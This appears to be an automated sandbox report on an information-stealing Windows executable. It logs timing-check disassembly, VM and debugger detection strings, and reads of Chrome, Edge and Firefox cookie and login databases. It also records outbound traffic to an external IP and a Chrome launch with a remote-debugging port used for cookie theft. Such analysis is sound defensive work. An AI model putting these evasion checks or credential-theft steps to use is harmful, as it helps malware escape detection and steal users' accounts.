Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991423 second address: 7991447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C6D17D0B4h 0x0000000b popad 0x0000000c mov dword ptr [edx+28h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991447 second address: 7991464 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991464 second address: 79914E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bh 0x00000005 call 00007F8C6D17D0B8h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ecx, dword ptr [esi+2Ch] 0x00000011 pushad 0x00000012 mov dx, 0412h 0x00000016 pushfd 0x00000017 jmp 00007F8C6D17D0B3h 0x0000001c and eax, 04534C0Eh 0x00000022 jmp 00007F8C6D17D0B9h 0x00000027 popfd 0x00000028 popad 0x00000029 mov dword ptr [edx+2Ch], ecx 0x0000002c jmp 00007F8C6D17D0AEh 0x00000031 mov ax, word ptr [esi+30h] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F8C6D17D0AAh 0x0000003e rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79914E5 second address: 79914F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC6478Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79914F4 second address: 79915BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F8C6D17D0ACh 0x00000014 and ch, 00000048h 0x00000017 jmp 00007F8C6D17D0ABh 0x0000001c popfd 0x0000001d mov bx, cx 0x00000020 popad 0x00000021 mov ax, word ptr [esi+32h] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F8C6D17D0B0h 0x0000002c sub al, FFFFFFA8h 0x0000002f jmp 00007F8C6D17D0ABh 0x00000034 popfd 0x00000035 push eax 0x00000036 pushfd 0x00000037 jmp 00007F8C6D17D0AFh 0x0000003c add cx, 3EEEh 0x00000041 jmp 00007F8C6D17D0B9h 0x00000046 popfd 0x00000047 pop eax 0x00000048 popad 0x00000049 mov word ptr [edx+32h], ax 0x0000004d pushad 0x0000004e pushad 0x0000004f pushad 0x00000050 popad 0x00000051 jmp 00007F8C6D17D0B9h 0x00000056 popad 0x00000057 mov bx, cx 0x0000005a popad 0x0000005b mov eax, dword ptr [esi+34h] 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79915BC second address: 79915C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79915C0 second address: 79915CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79915CF second address: 799160C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+34h], eax 0x0000000c jmp 00007F8C6CC6478Eh 0x00000011 test ecx, 00000700h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov edx, 19507070h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799160C second address: 7991631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F8CDB11B19Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edi, 729CE6D0h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991631 second address: 799172C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8C6CC6478Bh 0x00000009 and si, 5A7Eh 0x0000000e jmp 00007F8C6CC64799h 0x00000013 popfd 0x00000014 movzx esi, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a or dword ptr [edx+38h], FFFFFFFFh 0x0000001e jmp 00007F8C6CC64793h 0x00000023 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F8C6CC64794h 0x0000002e sub ecx, 113877D8h 0x00000034 jmp 00007F8C6CC6478Bh 0x00000039 popfd 0x0000003a mov ecx, 04F54E8Fh 0x0000003f popad 0x00000040 or dword ptr [edx+40h], FFFFFFFFh 0x00000044 jmp 00007F8C6CC64792h 0x00000049 pop esi 0x0000004a pushad 0x0000004b call 00007F8C6CC6478Eh 0x00000050 pushfd 0x00000051 jmp 00007F8C6CC64792h 0x00000056 or eax, 6395BC98h 0x0000005c jmp 00007F8C6CC6478Bh 0x00000061 popfd 0x00000062 pop eax 0x00000063 push eax 0x00000064 push edx 0x00000065 pushfd 0x00000066 jmp 00007F8C6CC6478Fh 0x0000006b adc esi, 0F95255Eh 0x00000071 jmp 00007F8C6CC64799h 0x00000076 popfd 0x00000077 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79E0CB2 second address: 79E0CFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8C6D17D0B7h 0x00000008 pop esi 0x00000009 call 00007F8C6D17D0B9h 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8C6D17D0ADh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7920013 second address: 7920019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7920C4D second address: 7920C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6D17D0ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7920C5D second address: 7920C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79708C9 second address: 7970932 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 mov esi, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F8C6D17D0B4h 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F8C6D17D0ACh 0x00000019 or ch, FFFFFFB8h 0x0000001c jmp 00007F8C6D17D0ABh 0x00000021 popfd 0x00000022 popad 0x00000023 mov edx, 6FAEA2DAh 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c push edi 0x0000002d pushfd 0x0000002e jmp 00007F8C6D17D0AAh 0x00000033 sbb ax, B918h 0x00000038 jmp 00007F8C6D17D0ABh 0x0000003d popfd 0x0000003e pop ecx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7940C44 second address: 7940C4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7940C4A second address: 7940C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7940C4E second address: 7940C74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC6478Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F8C6CC6478Bh 0x00000016 mov di, cx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7940C74 second address: 7940C7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7940C7A second address: 7940CC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64797h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov al, 2Ah 0x00000010 movsx ebx, cx 0x00000013 popad 0x00000014 and esp, FFFFFFF0h 0x00000017 jmp 00007F8C6CC64798h 0x0000001c sub esp, 44h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 mov ax, 8573h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7940E3E second address: 7940EB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C6D17D0ABh 0x00000008 push eax 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jc 00007F8CDC6FE688h 0x00000013 jmp 00007F8C6D17D0B2h 0x00000018 pop edi 0x00000019 pushad 0x0000001a mov ecx, 33FFB12Dh 0x0000001f pushfd 0x00000020 jmp 00007F8C6D17D0AAh 0x00000025 sub ch, FFFFFFC8h 0x00000028 jmp 00007F8C6D17D0ABh 0x0000002d popfd 0x0000002e popad 0x0000002f pop esi 0x00000030 pushad 0x00000031 mov ebx, eax 0x00000033 mov cx, EF37h 0x00000037 popad 0x00000038 pop ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F8C6D17D0B9h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79808E0 second address: 79808E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79808E6 second address: 7980917 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F8C6D17D0AEh 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7980917 second address: 798091F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, di 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 798091F second address: 7980925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7980925 second address: 7980929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7980929 second address: 798092D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Special instruction interceptor: First address: 130FA96 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window / User API: threadDelayed 2112 Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window / User API: threadDelayed 2465 Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window / User API: threadDelayed 2156 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 1866 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 8133 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 4.1 %
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 6544 Thread sleep count: 50 > 30 Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 6544 Thread sleep time: -100050s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 1440 Thread sleep count: 40 > 30 Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 1440 Thread sleep time: -80040s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 3176 Thread sleep count: 58 > 30 Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 3176 Thread sleep time: -116058s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 1532 Thread sleep count: 56 > 30 Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 1532 Thread sleep time: -112056s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 6004 Thread sleep count: 2112 > 30 Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 6004 Thread sleep time: -4226112s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 1488 Thread sleep count: 2465 > 30 Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 1488 Thread sleep time: -4932465s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 1248 Thread sleep count: 2156 > 30 Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 1248 Thread sleep time: -4314156s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 1016 Thread sleep count: 1866 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 1016 Thread sleep time: -186600s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 1016 Thread sleep count: 8133 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 1016 Thread sleep time: -813300s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\doomed\ Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2105336677.0000000002181000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: Amcache.hve.12.dr Binary or memory string: VMware
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.12.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.12.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.12.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.12.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.12.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.12.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.12.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000003.00000002.2482768165.000001E26F03E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
Source: Amcache.hve.12.dr Binary or memory string: vmci.sys
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.12.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.12.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.12.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr Binary or memory string: VMware20,1
Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.12.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.12.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.12.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.12.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.12.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: NTICE
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: SICE
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: SIWVID
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_000781E0 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,FreeLibrary, 13_2_000781E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_0007116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 13_2_0007116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_00071160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 13_2_00071160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_000711A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 13_2_000711A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_000713C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 13_2_000713C9
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: Amcache.hve.12.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: msmpeng.exe
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: Amcache.hve.12.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Source: Yara match File source: dump.pcap, type: PCAP
Source: global traffic TCP traffic: 192.168.2.5:49705 -> 185.121.15.192:80
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior

Remote Access Functionality

barindex
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs